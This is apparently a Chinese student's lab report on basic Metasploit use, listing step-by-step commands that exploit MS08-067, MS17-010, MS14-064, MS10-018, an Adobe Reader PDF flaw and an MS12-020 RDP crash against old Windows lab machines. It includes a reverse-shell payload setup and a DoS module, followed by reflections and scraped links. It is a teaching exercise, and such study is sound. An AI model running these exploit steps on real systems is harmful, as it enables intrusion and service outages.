一、实践内容

1.主动攻击实践

【1】MS08-067

MS08-067 漏洞是2008 年年底爆出的一个特大漏洞,存在于当时的所有微软系统,杀伤力超强。其原理是攻击者利用受害主机默认开放的SMB 服务端口445 ,发送恶意资料到该端口,通过MSRPC接口调用Server服务的一个函数,并破坏程序的战缓冲区,获得远程代码执行(Remote Code Execution) 权限,从而完全控制主机。

靶机:Windows Server 2003

search ms08_067                  //搜寻该漏洞对应的模块

use exploit/windows/smb/ms08_067_netapi    //启用该渗透攻击模块

show payloads                    //查看该模块所适用的攻击载荷模块

//作为攻击载荷的Payload就是通常所说的Shellcode,常用的攻击载荷类型有开放监听后门、回连至控制端的后门、运行某个命令或程序、下载并运行可执行文件、添加系统用户等
set payload generic/shell_reverse_tcp     //选择一个载荷(选择运行后门,让它回连至控制端)

show options                    //查看配置渗透攻击所需的配置选项

show targets                    //查看渗透攻击模块可以渗透攻击的目标平台

set RHOST 192.168.28.185             //设置目标机器IP

set LPORT 7777                   //设置攻击机端口

set LHOST 192.168.28.187             //设置攻击机IP

set target 0                    //设置目标系统类型,选择0(Automatic Targeting,自动判断目标类型)

//自动判断并不能保证绝对准确,真实渗透测试中,最好还是能够基于情报搜集环节的结果,进行主动确定

exploit                       //发起渗透攻击

【2】MS17-010

多个 Windows SMB 远程执行代码漏洞

当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。
为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。从内存进程获取敏感信息。

靶机:Windows 7 旗舰版

search ms17_010

use exploit/windows/smb/ms17_010_eternalblue

show targets

show options

set RHOST 192.168.28.166

exploit

2.针对浏览器的攻击

【1】MS14-064

该漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。成功利用这些漏洞的攻击者可以在当前用户的上下文中运行任意代码。如果当前用户使用管理用户权限登录,则攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。

靶机:Windows XP SP3

search ms14_064

use exploit/windows/browser/ms14_064_ole_code_execution

show targets

show options

set URIPATH ms14064        //这里是设置IP地址后的子路径名,若不设置,则随机生成一段字符串

exploit

//之后,在WinXP的IE浏览器上访问生成的url网址

sessions -i 1           //用于查看控制的电脑,需要注意metasploit反馈回来的是几号session被开启

【2】MS10_018(唯一)

search ms10_018

use exploit/windows/browser/ms10_018_ie_behaviors

set SRVHOST 192.168.28.187    //设置为本机IP

set SRVPORT 9999          //设置为本机端口

set URIPATH helloworld        //非必须

exploit               //之后,在WinXP上访问给出的Using URL

sessions -i                     #查看开启的会话

sessions -i 

3.针对客户端的攻击

Adobe阅读器渗透攻击

Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。

影响版本:Adobe Reader 8.2.4 - 9.3.4

靶机:Windows XP SP3

search adobe

use exploit/windows/fileformat/adobe_cooltype_sing

show options

set FILENAME adobe.pdf      //命名pdf,如不设置,则默认msf.pdf

exploit

sessions -i 2           //打开会话2,建立连接,控制shell

4.辅助模块的使用

【1】MS12-020

Microsoft windows远程桌面协议RDP远程代码执行漏洞。简介:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行, 然后控制系统。

靶机:Windows XP SP3

search ms12_020
use auxiliary/scanner/rdp/ms12_020_check          //进行ms12_020漏洞检查

show options

set RHOST 192.168.28.139

run
back

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids  //进行漏洞利用,使WinXP蓝屏

show options

set RHOST 192.168.28.139

exploit

【2】auxiliary中的arp_sweep主机发现模块

use auxiliary/scanner/discovery/arp_sweep

set RHOSTS 192.168.28.0/24          //设置扫描网段

exploit

二、问题与感想

1.解释什么是exploit,payload,encode

exploit : 测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。

payload : 攻击者在目标系统上执行的一段攻击代码,该代码具有返弹连接,创建用户,执行其他系统命令的功能。

encode : 编码是为了避免使攻击载荷不能完整运行的“坏字符”,同时也可改变特征码,帮助攻击载荷避免被杀软发现。

2.离实战还缺些什么技术或步骤?

WinXP、WinServer2003等机器版本过低,加上开启服务过多,基本处于不设防的状态,攻击显得比较容易。实战中,本次实验主要处于攻击渗透阶段,而前期需要做大量的情报搜集、漏洞探测与分析等工作,加之有防火墙、IDS等告警机制的干扰,较于本次实验,实战会复杂得多。

3.感想

metasploit的攻击模块与载荷都对操作系统和软件版本都有细致的要求,必须要在特定环境与配置中才能生效,这是msf的专一性与局限性所在。要想提高渗透与攻击的成功率,还是需要安全人员对计算机系统与服务等有较深地理解。

Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  6. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  10. 2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_rev ...

随机推荐

  1. springmvc流程图

  2. Maven deploy部署jar包到远程私仓

    Maven deploy部署jar包到远程私仓 maven deploy介绍 maven中的仓库分为两种,snapshot快照仓库和release发布仓库.snapshot快照仓库用于保存开发过程中的 ...

  3. Java Web相关问题

     关于这两天主要问题的解答: (1) 驱动程序无法使用安全套接字层(SSL)加密与 SQL Server 建立安全连接.错误: java.lang.RuntimeException: Could no ...

  4. Go语言打造以太坊智能合约测试框架(level3)

    传送门: 柏链项目学院 第三课 智能合约自动化测试 之前课程回顾 我们之前介绍了go语言调用exec处理命令行,介绍了toml配置文件的处理,以及awk处理文本文件获得ABI信息.我们的代码算是完成了 ...

  5. Python基础之注释,算数运算符,变量,输入和格式化输出

    Python的注释 注释的作用:用自己熟悉的语言,对某些代码进行标注说明,增强程序的可读性: 在python解释器解释代码的过程中,凡是#右边的,解释器都直接跳过这一行: 注释的分类 单行注释 # 这 ...

  6. 一个简易的kmp教学并给出java实现

    简单介绍一下问题 给定source字符串,找出target字符串出现的首位 例如 source   为“abddabddabc” target 为 “abddabc” 从第一位开始比较 |a b d ...

  7. 做嵌入式,C语言相关的朋友不要错过

    前言 相对来讲嵌入式相关的人群总体来说比较少,那么有没有一个聚集地呢? 为回馈读者,「编程珠玑」与「嵌入式linux」,「EmbeddDeveloper」三个公众号联合组织了此次福利活动,「编程珠玑」 ...

  8. 服务消费者Feign和Ribbon的区别

    1.Ribbon通过注解@EnableEurekaClient/@EnableDiscoveryClient向服务中心注册:    PS:选用的注册中心是eureka,那么就推荐@EnableEure ...

  9. button JS篇ant Design of react之二

    最近更新有点慢,更新慢的原因最近在看 <css世界>这本书,感觉很不错 <JavaScript高级程序设计> 这本书已经看了很多遍了,主要是复习前端的基础知识,基础知识经常会过 ...

  10. python基础 常见用法

    1.python计时器timeit模块 1)timeit 模块定义了接收两个参数的Timer类,两个参数都是字符串. 参数1:要计时的语句或者函数 参数2:为参数1构建环境的导入语句 2)Timer对 ...